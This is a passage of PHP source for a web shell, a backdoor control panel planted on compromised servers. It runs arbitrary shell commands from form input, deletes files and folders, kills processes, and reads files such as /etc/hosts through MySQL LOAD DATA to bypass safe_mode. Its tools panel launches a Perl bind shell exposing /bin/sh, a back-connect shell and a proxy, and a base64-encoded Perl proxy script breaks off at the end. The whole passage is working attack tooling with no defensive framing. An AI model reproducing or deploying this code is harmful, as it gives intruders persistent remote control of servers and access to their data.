$buffer1 = base64_encode($buffer1);
print "<td>
<form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&vnutr=1&baza=1&vn=$vn&db=$db'>
<input type=hidden name=delete_row value='$buffer1'>
<input type=submit value=Del onclick='return confirm(\"DELETE ?\")' style='border:1px; background-color:white;'>
</form><form method=post action='$php_self?p=sql&login=$login&pass=$pass&adress=$adress&conn=1&tbl=$tbl&baza=1&vn=$vn&db=$db'>
<input type=hidden name=edit_row value='$buffer1'>
<input type=submit value=Edit style='border:1px;background-color:green;'>
</form>
</td>\r\n";
print $b1;
print "</tr>";
unset($b1);
unset($buffer1);
}
mysql_free_result($result);
print "</table>";
} #end vnutr
print "</td></tr></table>";
} # end $conn
### end of sql
print "</tr></td></table> </td></tr></table>";
print $copyr;
die;
}
@$p=$_GET['p'];
if(@$_GET['p']=="selfremover"){
print "<tr><td>";
print "<font color=red face=verdana size=1>Are you sure?<br>
<a href='$php_self?p=yes'>Yes</a> | <a href='$php_self?'>No</a><br>
Remove: <u>";
$path=__FILE__;
print $path;
print " </u>?</td></tr></table>";
die;
}
if($p=="yes"){
$path=__FILE__;
@unlink($path);
$path=str_replace("\\","/",$path);
if(file_exists($path)){$hmm="NOT DELETED!!!";
print "<tr><td><font color=red>FILE $path NOT DELETED</td></tr>";
}else{$hmm="DELETED";}
print "<script>alert('$path $hmm');</script>";
}
if($os=="unix"){
function fastcmd(){
global $fast_commands;
$c_f=explode("\n",$fast_commands);
$c_f=count($c_f)-2;
print "
<form method=post>
Total commands: $c_f<br>
<select name=sh3>";
$c=substr_count($fast_commands," (vb) ");
for($i=0; $i<=$c; $i++){
$expl2=explode("\r\n",$fast_commands);
$expl=explode(" (vb) ",$expl2[$i]);
if(trim($expl[1])!=""){
print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
}
}
print "</select><br>
<input type=submit value=Exec>
</form>
";
}
}#end of os unix
if($os=="win"){
function fastcmd(){
global $fast_commands_win;
$c_f=explode("\n",$fast_commands_win);
$c_f=count($c_f)-2;
print "
<form method=post>
Total commands: $c_f<br>
<select name=sh3>";
$c=substr_count($fast_commands_win," (vb) ");
for($i=0; $i<=$c; $i++){
$expl2=explode("\r\n",$fast_commands_win);
$expl=explode(" (vb) ",$expl2[$i]);
if(trim($expl[1])!=""){
print "<option value='".trim($expl[1])."'>$expl[0]</option>\r\n";
}
}
print "</select><br>
<input type=submit value=Exec>
</form>
";
}
}#end of os win
echo "
<tr><td>";
if(@$_GET['sh311']=="1"){echo "<center>cmd<br>pwd:
";
chdir($d);
echo getcwd()."<br><br>
Fast cmd:<br>";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
<a href=\"javascript:cwd('$d')\">Insert pwd</a>
<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>
";
if(@$_POST['sh3']){
$sh3=$_POST['sh3'];
echo "<pre>";
print `$sh3`;
echo "</pre>";
}
}
if(@$_GET['sh311']=="2"){
echo "<center>cmd<br>
pwd:
";
chdir($d);
echo getcwd()."<br><br>
Fast cmd:<br>";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
<a href=\"javascript:cwd('$d ')\">Insert pwd</a>
<form name=sh311Form method=post><input name=sh3 size=110></form></center><br>";
if(@$_POST['sh3']){
$sh3=$_POST['sh3'];
echo "<pre>"; print `$sh3`; echo "</pre>";}
echo $copyr;
exit;}
if(@$_GET['delfl']){
@$delfolder=$_GET['delfolder'];
echo "DELETE FOLDER: <font color=red>".@$_GET['delfolder']."</font><br>
(All files must be writable)<br>
<a href='$php_self?deldir=1&dir=".@$delfolder."&rback=".@$_GET['rback']."'>Yes</a> || <a href='$php_self?d=$d'>No</a><br><br>
";
echo $copyr;
exit;
}
$mkdir=$_GET['mkdir'];
if($mkdir){
print "<br><b>Create Folder in $d :</b><br><br>
<form method=post>
New folder name:<br>
<input name=dir_n size=30>
</form><br>
";
if($_POST['dir_n']){
mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
print "<b><font color=green>Directory created success!</font></b>";
}
print $copyr;
die;
}
$mkfile=$_GET['mkfile'];
if($mkfile){
print "<br><b>Create file in $d :</b><br><br>
<form method=post>
File name:<br>
(example: hello.txt , hello.php)<br>
<input name=file_n size=30>
</form><br>
";
if($_POST['file_n']){
$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
fwrite($fp,"");
print "<b><font color=green>File created success!</font></b>";
}
print $copyr;
die;
}
$ps_table=$_GET['ps_table'];
if($ps_table){
if($_POST['kill_p']){
exec("kill -9 ".$_POST['kill_p']);
}
$str=`ps aux`;
# You can put here preg_match_all for other distrib/os
preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
print "<br><b>PS Table :: Fast kill program<br>
(p.s: Tested on Linux slackware 10.0)<br>
<br></b>";
print "<center><table border=1>";
for($i=0; $i<count($matches[3]); $i++){
$expl=explode(" ",$matches[0][$i]);
print "<tr><td>$expl[0]</td><td>PID: ".$matches[1][$i]." :: ".$matches[3][$i]."</td><form method=post><td><font color=red>Kill: <input type=submit name=kill_p value=".trim($matches[1][$i])."></td></form></tr>";
}#end of for
print "</table></center><br><br>";
unset($str);
print $copyr;
die;
}#end of ps table
$read_file_safe_mode=$_GET['read_file_safe_mode'];
if($read_file_safe_mode){
if(!isset($_POST['l'])){$_POST['l']="root";}
print "<br>
Read file content using MySQL - when <b>safe_mode</b>, <b>open_basedir</b> is <font color=green>ON</font><Br>
<form method=post>
<table>
<tr><td>Addr:</td><Td> <input name=serv_ip value='127.0.0.1'><input name=port value='3306' size=6></td></tr>
<tr><td>Login:</td><td><input name=l value=".$_POST['l']."></td></tr>
<tr><td>Passw:</td><td><input name=p value=".$_POST['p']."></td></tr></table>
(example: /etc/hosts)<br>
<input name=read_file size=45><br>
<input type=submit value='Show content'>
</form>
<br>";
if($_POST['read_file']){
$read_file=$_POST['read_file'];
@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("<font color=red>".mysql_error()."</font>");
mysql_create_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
mysql_select_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("<font color=red>".mysql_error()."</font>");
mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
$query = "SELECT * FROM tmp_file";
$result = mysql_query($query) or die("<font color=red>".mysql_error()."</font>");
print "<b>File content</b>:<br><br>";
for($i=0;$i<mysql_num_fields($result);$i++){
$name=mysql_field_name($result,$i);}
while($line=mysql_fetch_array($result, MYSQL_ASSOC)){
foreach ($line as $key =>$col_value) {
print htmlspecialchars($col_value)."<br>";}}
mysql_free_result($result);
mysql_drop_db("tmp_bd_file") or die("<font color=red>".mysql_error()."</font>");
}
print $copyr;
die;
}#end of read_file_safe_mode
# sys
$wich_f=$_GET['wich_f'];
$delete=$_GET['delete'];
$del_f=$_GET['del_f'];
$chmod=$_GET['chmod'];
$ccopy_to=$_GET['ccopy_to'];
# delete
if(@$_GET['del_f']){
if(!isset($delete)){
print "<font color=red>Delete this file?</font><br>
<b>$d/$wich_f<br><br></b>
<a href='$php_self?d=$d&del_f=$wich_f&delete=1'>Yes</a> / <a href='$php_self?d=$d'>No</a>
";}
if($delete==1){
unlink($d."/".$del_f);
print "<b>File: <font color=green>$d/$del_f DELETED!</font></b>
<br><b> <a href='$php_self?d=$d'># BACK</a>
";
}
echo $copyr;
exit;
}
# copy to
if($ccopy_to){
$wich_f=$_POST['wich_f'];
$to_f=$_POST['to_f'];
print "<font color=green>Copy file:<br>
$d/$ccopy_to</font><br>
<br>
<form method=post>
File:<br><input name=wich_f size=100 value='$d/$ccopy_to'><br><br>
To:<br><input name=to_f size=100 value='$d/vb_$ccopy_to'><br><br>
<input type=submit value=Copy></form><br><br>
";
if($to_f){
@copy($wich_f,$to_f) or die("<font color=red>Cannot copy!!! maybe folder is not writable</font>");
print "<font color=green><b>Copy success!!!</b></font><br>";
}
echo $copyr;
exit;
}
# chmod
if(@$_GET['chmod']){
$perms = @fileperms($d."/".$wich_f);
print "<b><font color=green>CHMOD file $d/$wich_f</font><br>
<br><center>This file chmod is</b> ";
print perm($perms);
print "</center>
<br>";
$chmd=<<<HTML
<script>
<!--
function do_chmod(user) {
var field4 = user + "4";
var field2 = user + "2";
var field1 = user + "1";
var total = "t_" + user;
var symbolic = "sym_" + user;
var number = 0;
var sym_string = "";
if (document.chmod[field4].checked == true) { number += 4; }
if (document.chmod[field2].checked == true) { number += 2; }
if (document.chmod[field1].checked == true) { number += 1; }
if (document.chmod[field4].checked == true) {
sym_string += "r";
} else {
sym_string += "-";
}
if (document.chmod[field2].checked == true) {
sym_string += "w";
} else {
sym_string += "-";
}
if (document.chmod[field1].checked == true) {
sym_string += "x";
} else {
sym_string += "-";
}
if (number == 0) { number = ""; }
document.chmod[total].value = number;
document.chmod[symbolic].value = sym_string;
document.chmod.t_total.value = document.chmod.t_owner.value + document.chmod.t_group.value + document.chmod.t_other.value;
document.chmod.sym_total.value = "-" + document.chmod.sym_owner.value + document.chmod.sym_group.value + document.chmod.sym_other.value;
}
//-->
</script>
<form name="chmod" method=post>
<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
<tr bgcolor="gray">
<td align="left"><b>Permission</b></td>
<td align="center"><b>Owner</b></td>
<td align="center"><b>Group</b></td>
<td align="center"><b>Other</b></td>
<td bgcolor="#dddddd" rowspan="4"> </td>
</tr><tr bgcolor="#dddddd">
<td align="left" nowrap><b>Read</b></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
</tr><tr bgcolor="#dddddd">
<td align="left" nowrap><b>Write</b></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
</tr><tr bgcolor="#dddddd">
<td align="left" nowrap><b>Execute</b></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
<td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
</tr><tr bgcolor="#dddddd">
<td align="right" nowrap>Octal:</td>
<td align="center"><input type="text" name="t_owner" value="" size="1"></td>
<td align="center"><input type="text" name="t_group" value="" size="1"></td>
<td align="center"><input type="text" name="t_other" value="" size="1"></td>
<td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
</tr><tr bgcolor="#dddddd">
<td align="right" nowrap>Symbolic:</td>
<td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
<td align="center"><input type="text" name="sym_group" value="" size="3"></td>
<td align="center"><input type="text" name="sym_other" value="" size="3"></td>
<td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
</tr>
</table></td></tr></table></p>
HTML;
print "<center>".$chmd."
<b>$d/$wich_f</b><br><br>
<input type=submit value=CHMOD></form>
</center>
</form>
";
$t_total=$_POST['t_total'];
if($t_total){
chmod($d."/".$wich_f,$t_total);
print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
print "<a href='$php_self?d=$d'># BACK</a><br><br>";
}
echo $copyr;
exit;
}
# rename
if(@$_GET['rename']){
print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
<center>
<form method=post>
<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
<input name=rto size=40 value='$wich_f'><br><br>
<input type=submit value=RENAME>
</form>
";
@$rto=$_POST['rto'];
if($rto){
$fr1=$d."/".$wich_f;
$fr1=str_replace("//","/",$fr1);
$to1=$d."/".$rto;
$to1=str_replace("//","/",$to1);
rename($fr1,$to1);
print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
}
echo $copyr;
exit;
}
if(@$_GET['deldir']){
@$dir=$_GET['dir'];
function deldir($dir)
{
$handle = @opendir($dir);
while (false!==($ff = @readdir($handle))){
if($ff != "." && $ff != ".."){
if(@is_dir("$dir/$ff")){
deldir("$dir/$ff");
}else{
@unlink("$dir/$ff");
}}}
@closedir($handle);
if(@rmdir($dir)){
@$success = true;}
return @$success;
}
$dir=@$dir;
deldir($dir);
$rback=$_GET['rback'];
@$rback=explode("/",$rback);
$crb=count($rback);
for($i=0; $i<$crb-1; $i++){
@$x.=$rback[$i]."/";
}
echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
echo $copyr;
exit;}
if(@$_GET['t']=="tools"){
# unix
if($os=="unix"){
print "
<center><br>
<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run it again.</b><br></font>
<table border=1>
<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
</table>
</center>
<br><Br>
";
}#end of unix
if($_POST['perl_bd']){
$port=$_POST['port'];
$perl_bd_scp = "
use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
close X;}}";
if(is_writable("/tmp")){
$fp=fopen("/tmp/vb_perl_bd.pl","w");
fwrite($fp,"$perl_bd_scp");
passthru("nohup perl /tmp/vb_perl_bd.pl &");
unlink("/tmp/vb_perl_bd.pl");
}else{
if(is_writable(".")){
mkdir(".vb_bd_tmp");
$fp=fopen(".vb_bd_tmp/vb_perl_bd.pl","w");
fwrite($fp,"$perl_bd_scp");
passthru("nohup perl .vb_bd_tmp/vb_perl_bd.pl &");
unlink(".vb_bd_tmp/vb_perl_bd.pl");
rmdir(".vb_bd_tmp");
}
}
$show_ps="1";
}#end of start perl_bd
if($_POST['perl_proxy']){
$port=$_POST['port'];
$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3